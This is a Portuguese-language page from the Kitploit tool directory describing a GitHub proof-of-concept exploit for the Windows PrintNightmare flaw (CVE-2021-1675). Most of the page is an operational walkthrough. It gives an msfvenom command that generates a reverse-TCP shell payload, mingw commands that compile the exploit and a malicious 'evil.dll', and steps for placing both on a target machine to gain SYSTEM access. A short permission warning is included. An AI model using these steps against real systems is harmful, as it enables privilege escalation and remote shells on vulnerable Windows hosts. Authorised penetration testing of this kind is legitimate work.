Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-1675 — Exploit local de escalonamento de privilégios para CVE-2021-1675 (PrintNightmare) que instala uma DLL maliciosa para obter acesso SYSTEM em sistemas Windows vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/andrewtrube/cve-2021-1675
Escalada de PrivilégiosFrameworks de ExploraçãoExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

Exploit local de escalonamento de privilégios para CVE-2021-1675 (PrintNightmare) que instala uma DLL maliciosa para obter acesso SYSTEM em sistemas Windows vulneráveis.

Ver Repositório
515há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC de Escalação de Privilégio Local PrintNightmare

src/nightmare.cpp: código-fonte para explorar CVE-2021-1675 e obter acesso de sistema instalando uma dll maliciosa
src/payload-dll.cpp: código-fonte para dll com shellcode malicioso na função de entrada

!!Use apenas contra servidores nos quais você tem permissão para testar

Resumo

CVE-2021-1675 é uma vulnerabilidade no Serviço de Fila de Impressão (Print Spooler Service) do Microsoft Windows que permite a um atacante contornar a verificação de SeLoadDriverPrivilege. Isso pode ser explorado para obter escalação de privilégio na máquina alvo instalando uma DLL maliciosa que chama shellcode ou usa a API do Windows para estabelecer uma conexão de shell reverso. Versões do Windows 10/8/Server 2008/Server 2012 anteriores a 8 de junho de 2021 são afetadas.

POC

  1. Baixe ou clone o repositório git
  2. Use o msfvenom para gerar um payload adequado em c $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. Cole a saída do msfvenom em payload-dll.cpp onde diz 'change me'
  4. Compile o executável principal x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. Compile a dll x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. Arquive o exe e a dll e, em seguida, encontre uma maneira de enviar o arquivo para sua máquina alvo zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. Depois que o arquivo estiver na máquina Windows alvo, extraia-o
  8. Mova evil.dll para c:\windows\temp\evil.dll
  9. Execute o PrintNightmareLPE.exe

Notas

  • Se tudo estiver funcionando corretamente, o exploit deve iterar pelos drivers de impressora do Windows e exibir os resultados
  • Você pode alterar o caminho do arquivo de onde o PrintNightmareLPE.exe carrega a evil.dll dentro do código-fonte
  • atualmente a dll maliciosa apenas carrega calc.exe como Prova-de-Conceito
Baixar ferramenta